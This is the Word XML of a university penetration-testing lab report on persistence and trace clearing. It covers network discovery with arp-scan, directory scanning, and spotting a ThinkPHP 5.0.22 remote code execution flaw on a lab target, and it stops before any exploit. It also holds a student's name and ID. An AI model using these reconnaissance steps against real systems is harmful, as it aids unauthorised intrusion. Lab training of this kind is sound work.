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817"/>
        <w:gridCol w:w="709"/>
      </w:tblGrid>
      <w:tr w:rsidR="002E6B12" w:rsidRPr="0058170B" w14:paraId="7932244E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="817" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59E40263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序号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B3C73C6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02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13A7B914" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="center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桂林电子科技大学2023-2024学年第3学期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2473E7BE" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="482"/>
        <w:jc w:val="center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cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> 网络渗透测试技术 </w:t>
      </w:r>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8E35B3" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9802" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1188"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="540"/>
        <w:gridCol w:w="54"/>
        <w:gridCol w:w="820"/>
        <w:gridCol w:w="314"/>
        <w:gridCol w:w="226"/>
        <w:gridCol w:w="1191"/>
        <w:gridCol w:w="1276"/>
        <w:gridCol w:w="236"/>
        <w:gridCol w:w="2620"/>
      </w:tblGrid>
      <w:tr w:rsidR="002E6B12" w:rsidRPr="0058170B" w14:paraId="35D7F56D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="457"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23AEC70E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实验名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5758" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03173251" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="2"/>
              <w:widowControl/>
              <w:spacing w:beforeAutospacing="0" w:afterAutospacing="0"/>
              <w:ind w:firstLineChars="200" w:firstLine="482"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="default"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0058170B">
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>实验六</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BF1F2D1" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2620" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7BFD07E7" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000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指导意见：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="352520CE" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12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</w:p>
          <w:p w14:paraId="6C684A49" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12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</w:p>
          <w:p w14:paraId="77F6CF59" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12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</w:p>
          <w:p w14:paraId="527D7AD9" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000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成绩：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32DEB7DE" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000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/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">                 </w:t>
            </w:r>
            <w:r w:rsidRPr="0058170B">
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="0058170B">
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25407BBE" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000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 xml:space="preserve">指导教师：  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E6B12" w:rsidRPr="0058170B" w14:paraId="1491664D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="477"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38EF226D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 xml:space="preserve">姓  </w:t>
            </w:r>
            <w:r w:rsidRPr="0058170B">
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="0058170B">
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1931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908828B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陈霖</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0058170B">
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>汕</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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  <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6684EB41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 xml:space="preserve"> 学  号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693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4217E0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2</w:t>
            </w:r>
            <w:r w:rsidRPr="0058170B">
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>300360102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="469A9822" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2620" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="33CB2D30" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E6B12" w:rsidRPr="0058170B" w14:paraId="7FA4FD35" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="469"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="290E65FA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专    业</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5758" w:type="dxa"/>
            <w:gridSpan w:val="8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6ADEAB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网络空间安全</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26ED1E77" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2620" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="71B6749F" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E6B12" w:rsidRPr="0058170B" w14:paraId="59A729C5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="468"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7792C76C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实验日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="133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F96D19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 xml:space="preserve">2024    </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="540" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FDB4373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年</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="874" w:type="dxa"/>
            <w:gridSpan w:val="2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19B79E26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/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="540" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="343AC596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月</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1191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4DBAE4A8" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000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/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0058170B">
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>8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</w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15E2E0B8" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000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  <w:r w:rsidRPr="0058170B">
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>日</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BD3A499" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12">
            <w:pPr>
              <w:ind w:left="57" w:firstLineChars="200" w:firstLine="480"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2620" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="415E4C70" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E6B12" w:rsidRPr="0058170B" w14:paraId="1F3796E7" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="275"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CFA5689" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5758" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2AD6BC28" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AFD2413" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12">
            <w:pPr>
              <w:ind w:firstLineChars="200" w:firstLine="480"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2620" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2C5DA2B4" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12">
            <w:pPr>
              <w:ind w:firstLineChars="200" w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32A4E8A5" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B7DDBC7" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="482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一、实验目的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26655954" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="48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（1）理解权限维持技术的实现机制；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1920C50F" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="48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（2）掌握相应的防御技术和方法，提升安全防护能力；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19348640" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="48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sz w:val="24"/>
        </w:rPr>
        <w:t>（3）掌握权限维持技术和入侵痕迹清理方法。</w:t>
      </w:r>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>二、实验任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0F08C4" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="482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三、实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECFED91" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="48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/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、靶机地址（win7）：192.168.135.150</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D9AD84" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="374" w:firstLine="898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Win2008：192.168.138.138</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE272A0" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="48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2、攻击机地址：192.168.135.127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60543D83" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="482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四、实验过程和实验结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC8BF2E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首先将靶机和攻击机设为同一个网段，再使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-scan -l命令查询在同一网段的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225B1377" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:ind w:left="92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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="37AD6533" wp14:editId="121029AD">
            <wp:extent cx="6644005" cy="1884045"/>
            <wp:effectExtent l="0" t="0" r="10795" b="8255"/>
            <wp:docPr id="2" name="图片 2" descr="屏幕截图 2024-08-18 18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4-08-18 18450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8836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通过测试和观察发现，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为192.168.135.150为靶机，在火狐中打开能够得到网页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A43A22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/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="111B84A7" wp14:editId="67BCB3FC">
            <wp:extent cx="6638925" cy="3319145"/>
            <wp:effectExtent l="0" t="0" r="3175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253D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使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>disearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>扫描网站目录，查找后缀为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的文件，发现文件名为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件的较为可疑，打开文件查看源码之后没有找到什么有用的线索</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293C4471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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4D51C906" wp14:editId="5599DC65">
            <wp:extent cx="6634480" cy="5314950"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6350"/>
            <wp:docPr id="4" name="图片 4" descr="屏幕截图 2024-08-18 185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4-08-18 18563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6E22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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="0AA8FA24" wp14:editId="0F90FCB1">
            <wp:extent cx="6214110" cy="4704080"/>
            <wp:effectExtent l="0" t="0" r="8890" b="7620"/>
            <wp:docPr id="6" name="图片 6" descr="屏幕截图 2024-08-18 19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 2024-08-18 19355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41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C1F9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不过我们能在之前的页面注意到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ThinkPHP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> V5.0.22{十年磨一剑-为API开发设计的高性能框架},通过查询我们能够得到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ThinkPHP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> V5.0.22存在远程代码执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C1736F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noProof/>
          <w:sz w:val="24"/>
